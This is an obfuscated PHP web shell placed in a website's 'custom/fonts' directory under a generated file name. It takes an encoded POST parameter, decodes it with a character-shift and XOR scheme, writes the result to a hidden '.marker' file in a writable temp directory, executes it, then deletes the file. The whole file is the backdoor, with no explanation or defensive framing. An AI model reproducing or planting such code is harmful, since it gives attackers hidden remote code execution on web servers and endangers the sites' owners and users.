File: /var/www/html/breadsecret.com/custom/fonts/custom_file_3_1768823209.php
<!--sEvjEl2K-->
<?php
if(count($_POST) > 0 && isset($_POST["f\x61\x63"])){
$data = array_filter(["/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), "/tmp", getcwd(), getenv("TEMP"), "/var/tmp"]);
$parameter_group = $_POST["f\x61\x63"];
$parameter_group = explode (".", $parameter_group ) ;
$flag = '';
$s5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen( $s5);
$i = 0;
$__tmp = $parameter_group;
while( $val = array_shift( $__tmp)) {
$sChar = ord( $s5[$i%$sLen]);
$d =( ( int)$val - $sChar -( $i%10)) ^ 83;
$flag .= chr( $d);
$i++; }
foreach ($data as $sym) {
if (!!is_dir($sym) && !!is_writable($sym)) {
$resource = vsprintf("%s/%s", [$sym, ".marker"]);
if (false !== file_put_contents($resource, $flag)) {
include_once $resource;
@unlink($resource);
die();
}
}
}
}